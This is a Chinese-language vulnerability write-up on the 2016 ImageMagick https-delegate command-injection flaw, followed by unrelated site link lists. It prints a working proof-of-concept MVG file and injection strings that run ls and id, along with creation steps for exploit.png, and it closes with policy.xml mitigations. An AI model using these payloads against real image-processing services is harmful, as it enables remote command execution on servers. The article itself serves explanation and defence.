深入浅析ImageMagick命令执行漏洞


Posted in Python onOctober 11, 2016

00 前言

什么是ImageMagick?

ImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。

由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理工作,比如用户头像生成、图片编辑等。

01 漏洞描述

ImageMagick是一款开源图片处理库,支持PHP、Ruby、NodeJS和Python等多种语言,使用非常广泛。包括PHP imagick、Ruby rmagick和paperclip以及NodeJS imagemagick等多个图片处理插件都依赖它运行。当攻击者构造含有恶意代码得图片时,ImageMagick库对于HTTPPS文件处理不当,没有做任何过滤,可远程实现远程命令执行,进而可能控制服务器。

02 影响程度

攻击成本:低

危害程度:高

影响范围:ImageMagick 6.9.3-9以前的所有版本

03 漏洞分析

命令执行漏洞是出在ImageMagick对https形式的文件处理的过程中。

ImageMagick之所以支持那么多的文件格式,是因为它内置了非常多的图像处理库,对于这些图像处理库,ImageMagick给它起了个名字叫做”Delegate”(委托),每个Delegate对应一种格式的文件,然后通过系统的system()命令来调用外部的lib进行处理。调用外部lib的过程是使用系统的system命令来执行的,导致命令执行的代码。

ImageMagick委托的默认配置文件: /etc/ImageMagick/delegates.xml

具体代码请参考:Github-ImageMagick

我们定位到https委托得那一行:

" <delegate decode=\"https\" command=\""wget" -q -O "%o" "https:%M"\"/>"

可以看到,command定义了它对于https文件处理时带入system()函数得命令:"wget" -q -O "%o" "https:%M"。

wget是从网络下载文件得命令,%M是一个占位符,它得具体定义在配置文件中如下:

%i input image filename
%o output image filename
%u unique temporary filename
%Z unique temporary filename
%# input image signature
%b image file size
%c input image comment
%g image geometry
%h image rows (height)
%k input image number colors
%l image label
%m input image format
%p page number
%q input image depth
%s scene number
%w image columns (width)
%x input image x resolution
%y input image y resolution

可以看到%m被定义为输入的图片格式,也就是我们输入的url地址。但是由于只是做了简单的字符串拼接,没有做任何过滤,直接拼接到command命令中,所以我们可以将引号闭合后通过"|",”`”,”&”等带入其他命令,也就形成了命令注入。

比如我们传入如下代码:

https://test.com"|ls “-al

则实际得system函数执行得命令为:

“wget” -q -O “%o” “ https://test.com"|ls “-al”

这样,ls -al命令成功执行。

04 漏洞利用

这个漏洞得poc由老外给出得,如下:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context

push和pop是用于堆栈的操作,一个进栈,一个出栈;

viewbox是表示SVG可见区域的大小,或者可以想象成舞台大小,画布大小。简单理解就是根据后面得参数选取其中得一部分画面;

fill url()是把图片填充到当前元素内;

在其中我们使用了fill url()的形式调用存在漏洞的https delegate,当ImageMagick去处理这个文件时,漏洞就会被触发。

附:ImageMagick默认支持一种图片格式,叫mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,允许在其中加载ImageMagick中其他的delegate(比如存在漏洞的https delegate)。并且在图形处理的过程中,ImageMagick会自动根据其内容进行处理,也就是说我们可以将文件随意定义为png、jpg等网站上传允许的格式,这大大增加了漏洞的可利用场景。

利用过程:

创建一个exploit.png文件,包含以下内容:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://test.com/image.jpg"|ls "-al)'
pop graphic-context

执行命令:convert exploit.png 1.png(后面的是convert的参数)

深入浅析ImageMagick命令执行漏洞

05 漏洞修复

升级到最新版本

配置/etc/ImageMagick/policy.xml的方式来禁止https、mvg这些delegate,或者直接在配置文件删除相应的delegate

<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>

以上所述是小编给大家介绍的ImageMagick命令执行漏洞的知识,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!

Python 相关文章推荐
python获取beautifulphoto随机某图片代码实例
Dec 18 Python
python获取网页状态码示例
Mar 30 Python
利用Python的Django框架生成PDF文件的教程
Jul 22 Python
Django获取该数据的上一条和下一条方法
Aug 12 Python
Python Pillow.Image 图像保存和参数选择方式
Jan 09 Python
完美解决pyinstaller打包报错找不到依赖pypiwin32或pywin32-ctypes的错误
Apr 01 Python
Python嵌入C/C++进行开发详解
Jun 09 Python
Python requests模块安装及使用教程图解
Jun 30 Python
用python计算文件的MD5值
Dec 23 Python
Python实现给PDF添加水印的方法
Jan 25 Python
python 批量压缩图片的脚本
Jun 02 Python
pytorch实现加载保存查看checkpoint文件
Jul 15 Python
Zabbix实现微信报警功能
Oct 09 #Python
python 2.6.6升级到python 2.7.x版本的方法
Oct 09 #Python
Django1.7+python 2.78+pycharm配置mysql数据库
Oct 09 #Python
解决python2.7 查询mysql时出现中文乱码
Oct 09 #Python
基于python脚本实现软件的注册功能(机器码+注册码机制)
Oct 09 #Python
python连接mysql实例分享
Oct 09 #Python
Python中运算符&quot;==&quot;和&quot;is&quot;的详解
Oct 08 #Python
You might like
GD输出汉字的函数的分析
2006/10/09 PHP
php Smarty date_format [格式化时间日期]
2010/03/15 PHP
PHP小技巧之JS和CSS优化工具Minify的使用方法
2014/05/19 PHP
PHP判断来访是搜索引擎蜘蛛还是普通用户的代码小结
2015/09/14 PHP
JQuery 将元素显示在屏幕的中央的代码
2010/02/27 Javascript
JavaScript 函数replace深入了解
2013/03/14 Javascript
javascript垃圾收集机制与内存泄漏详细解析
2013/11/11 Javascript
JQuery的ready函数与JS的onload的区别详解
2013/11/21 Javascript
js获取判断上传文件后缀名的示例代码
2014/02/19 Javascript
Javascript学习笔记之相等符号与严格相等符号
2014/11/23 Javascript
不同编码的页面表单数据乱码问题解决方法
2015/02/15 Javascript
快速掌握Node.js事件驱动模型
2016/03/21 Javascript
jquery+css实现简单的图片轮播效果
2017/08/07 jQuery
vue实现压缩图片预览并上传功能(promise封装)
2019/01/10 Javascript
vue2.0 如何在hash模式下实现微信分享
2019/01/22 Javascript
vue中keep-alive,include的缓存问题
2019/11/26 Javascript
基于Cesium绘制抛物弧线
2020/11/18 Javascript
javascript实现移动端轮播图
2020/12/09 Javascript
[50:28]2018DOTA2亚洲邀请赛 3.31 小组赛 A组 Newbee vs KG
2018/04/01 DOTA
Python入门篇之面向对象
2014/10/20 Python
轻松实现python搭建微信公众平台
2016/02/16 Python
python字符串,数值计算
2016/10/05 Python
python得到一个excel的全部sheet标签值方法
2018/12/10 Python
dataframe 按条件替换某一列中的值方法
2019/01/29 Python
python Qt5实现窗体跟踪鼠标移动
2019/12/13 Python
HTML5离线缓存在tomcat下部署可实现图片flash等离线浏览
2012/12/13 HTML / CSS
安全大检查实施方案
2014/02/22 职场文书
课堂教学改革实施方案
2014/03/17 职场文书
毕业自我鉴定怎么写
2014/03/25 职场文书
合作意向协议书范本
2014/03/31 职场文书
审查起诉阶段律师意见书
2015/05/19 职场文书
故意伤害罪辩护词
2015/05/21 职场文书
教师读书活动心得体会
2016/01/14 职场文书
MySQL8.0无法启动3534的解决方法
2021/06/03 MySQL
详解 TypeScript 枚举类型
2021/11/02 Javascript
HTML中link标签属性的具体用法
2023/05/07 HTML / CSS